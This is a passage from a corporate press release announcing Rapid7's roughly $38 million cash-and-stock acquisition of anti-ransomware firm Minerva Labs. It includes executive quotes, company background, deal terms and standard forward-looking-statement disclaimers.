“Driving efficiency and maximizing security investments is critical in order for organizations to stay ahead of increasingly evasive and creative attacks,” said Jeremiah Dewey, senior vice president, managed services delivery at Rapid7. “Today, our MDR customers benefit from our proprietary detection and response technology, a fully integrated, world-class team of 24x7 security engineers, and leading security data science to detect, assess and respond to emerging threats. With Minerva, we are further extending our MDR capabilities with more advanced anti-evasion and malware prevention and orchestration from the endpoint to the cloud, as well as providing seamless support of existing, leading endpoint protection infrastructure. We are thrilled to welcome Minerva to Rapid7 and continue providing our customers and partners with a world-class MDR service and the opportunity for further technology and security operations consolidation.”

“Today is a monumental day for Minerva,” said Eddy Bobritsky, co-founder and CEO of Minerva Labs. “We’ve worked tirelessly to create technology that combats ransomware and puts the power back in the hands of organizations. We are excited to join Rapid7 to continue this journey and integrate our technology into Rapid7’s industry-leading managed detection and response capabilities.”

Minerva Labs was co-founded in 2014 by Eddy Bobritsky and Erez Breiman to help organizations mitigate the risks associated with ransomware. Minerva’s technology provides multi-layer prevention by neutralizing and preventing malicious activity before execution, while also enabling more agility to integrate with third-party endpoint protection solutions.

**Transaction Details**

Under the terms of the agreement, Rapid7 will pay approximately $38 million in cash and stock to acquire Minerva Labs, Ltd., subject to certain adjustments. The acquisition of Minerva is not expected to have a material financial impact to Rapid7’s Annualized Recurring Revenue growth, revenue, non-GAAP operating income, and non-GAAP net income per share for calendar year 2023, as guided on February 8, 2023.

**About Rapid7**  
Rapid7, Inc. (Nasdaq: RPD) is on a mission to create a safer digital world by making cybersecurity simpler and more accessible. We empower security professionals to manage a modern attack surface through our best-in-class technology, leading-edge research, and broad, strategic expertise. Rapid7’s comprehensive security solutions help more than 10,000 global customers unite cloud risk management and threat detection to reduce attack surfaces and eliminate threats with speed and precision. For more information, visit our website, check out our blog, or follow us on LinkedIn or Twitter.

**Cautionary Language Concerning Forward-Looking Statements**

This press release includes forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. These forward-looking statements include, but are not limited to, the statements regarding our expectations for the acquisition of Minerva (the “Acquisition”), anticipated financial impacts of the Acquisition, our future performance, growth and operating leverage, and the ability of our solutions to drive profitable, sustainable growth. Our use of the words “anticipate,” “believe,” “estimate,” “expect,” “intend,” “may,” “will” and similar expressions are intended to identify forward-looking statements. The events described in our forward-looking statements are subject to a number of risks and uncertainties, assumptions and other factors that could cause actual results and the timing of certain events to differ materially from future results expressed or implied by the forward-looking statements. Risks that could cause or contribute to such differences include, but are not limited to, the ability to recognize the anticipated benefits of the Acquisition, which may be affected by, among other things, competition and the ability of the combined company to grow and manage growth profitably and retain its key employees, costs related to the Acquisition, growing macroeconomic uncertainty, unstable market and economic conditions, fluctuations in our quarterly results, risks arising from the ongoing COVID-19 pandemic, failure to meet our publicly announced guidance or other expectations about our business, our ability to sustain our revenue growth rate, the ability of our products and professional services to correctly detect vulnerabilities, our customers renewal of their subscriptions with us, competition in the markets in which we operate, market growth, our ability to innovate and manage our growth, our sales cycles, our ability to integrate acquired companies, and our ability to operate in compliance with applicable laws as well as other risks and uncertainties set forth in the “Risk Factors” section of our most recent Quarterly Report on Form 10-K filed with the Securities and Exchange Commission (the “SEC”) on February 24, 2023 and in the subsequent reports that we file with the SEC. Moreover, we operate in a very competitive and rapidly changing environment. New risks emerge from time to time. It is not possible for our management to predict all risks, nor can we assess the impact of all factors on our business or the extent to which any factor, or combination of factors, may cause actual results to differ materially from rapid7.com those expressed in any forward-looking statements we may make. Except as required by law, we undertake no obligation to update any forward-looking statements to reflect events or circumstances after the date of such statements. You should, therefore, not rely on these forward-looking statements as representing our views as of any date subsequent to the date of this press release.

Tag

#mac